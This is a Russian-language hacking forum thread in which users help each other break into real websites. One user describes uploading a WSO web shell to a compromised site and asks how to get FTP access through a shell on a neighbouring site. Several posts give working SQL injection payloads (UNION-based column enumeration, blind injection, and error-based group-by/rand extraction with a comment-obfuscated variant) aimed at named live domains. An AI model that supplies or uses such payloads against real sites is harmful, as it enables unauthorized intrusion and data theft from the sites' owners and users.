Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    потому что пароли в DES.
     
  2. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    А как его раскодировать
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://forum.antichat.net/thread259411.html
     
    _________________________
  4. Chuvash

    Chuvash New Member

    Joined:
    12 Mar 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Залил шелл wso, была необходимость создать файл .htaccess
    Теперь ни шелл ни сайт не открываются. Вылазиет ошибка
    "IISPassword
    The page cannot be displayed"
    Что можно сделать?
     
  5. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Но ведь IIS не Апач, и .htaccess'oм все равно ничего нельзя добиться. Правда, вроде нагуглил аналог - web.config, в который можно импортировать часть настроек .htaccess, если не ошибаюсь, конечно.
     
  6. Chuvash

    Chuvash New Member

    Joined:
    12 Mar 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Да у меня скрипт 1 не запускался надо было кое-что подправить в htaccess Во ттеперь думаю мож как нибудь получить доступ через фтп чтоб удалить файл. Можно как то получить доступ к фтп через шелл лежащий на соседнем сайте? чтобы удалить файл htaccess
     
  7. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    У меня подобное было, когда я накосячил с правкой .htaccess'а - вместо редиректа мобильных устройств на лендинг, редирект "случился" у всех, кто заходил на сайт, включая и стационарные компьютеры, лол. Ничего, вернулся админ, почистил .htaccess, шелл не удалил, естесственно. Так что подожди денек, починят :) А насчет паролей от ftp - это вопрос к знатокам :)
     
  8. Chuvash

    Chuvash New Member

    Joined:
    12 Mar 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Спасибо буду ждать, владельцы сайта надеюсь до админов достучатся, а то по логам админы давно не лазили на сайте.
     
  9. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    order by
    group by
     
    2 people like this.
  10. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://forum.antichat.ru/thread240692.html
     
  11. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    в любом текстовом редакторе напиши от 1 до 0 через запятую и потом просто вставь 5 раз вот и будет 50,не обязательно чтобы было от 1 до 50
    а так есть где то в гугле мини софт для этого
     
  12. GaMeSTeR

    GaMeSTeR Banned

    Joined:
    3 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Вот писал под себя:
    http://www.sendspace.com/file/7h37av

    В поле Number пишется либо число колонок либо вставляется ссылка вида http://site.com/index.php?id=1+ORDER+BY+5+--+ если нажать на поле и в буфере будет ссылка такого вида то она автоматически замениться на http://site.com/index.php?id=1+aNd+1=0+UNION+SELECT+1,2,3,4,5+--+
     
    1 person likes this.
  13. GaMeSTeR

    GaMeSTeR Banned

    Joined:
    3 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Не хотел светить, но чтобы набраться опыта готов пожертвовать)

    http://www.ibs.ua/card.php?id=3182+aNd+'1'='0'+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

    Все перепробовал но путь до сайта найти не могу, помогите!
     
  14. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    нужна помосчь с запросом для раскрутки,непойму как вывести инфу
    Code:
    http://1000-tv.ru/peredacha/per-list.php?ch=pervyi'&per=pust_govoryat
     
  15. GaMeSTeR

    GaMeSTeR Banned

    Joined:
    3 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Думаю не получиться там фильтрация + если фильтрацию проходим то дописываемся после from'a:

    SELECT * ....... from tv1000_db.[sql]_peredacha
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    нарлд как скулю разкрутить? http://www.imperiya.by/news.html?id=69799+union+select+1,2,3,4,5,6,7,8--+
     
  17. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Code:
    _http://www.imperiya.by/news.html
    ?id=69799+and+1=(if(ascii(substr(version(),1,1))=53,1,0))--+
    как слепую, вывод в заголовке. версия 5.+
     
  18. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    помогите ребята
    есть Error:
    Code:
    http://domain.dm/?s11='
    и вывод:
    Code:
    SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?s11='' AND cookie_info=''' at line 1]
    SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
    запрос такой:
    Code:
    SELECT is_may_cached FROM mos_jrecache_repository WHERE url='/content/ view/4928/223/' AND cookie_info='';
    как раскрутить?
     
  19. GaMeSTeR

    GaMeSTeR Banned

    Joined:
    3 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Ссылку бы дал. Можешь вот этот код пихнуть:

    '+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()+),1,64),floor(rand(0)*2)))+--+

    или так:

    '/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/version()/**/),1,64),floor(rand(0)*2)))/**/and/**/'1'='1


    Минус только ограничение на вывод 63 байта
     
  20. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    спасибо друг ;)
     
Thread Status:
Not open for further replies.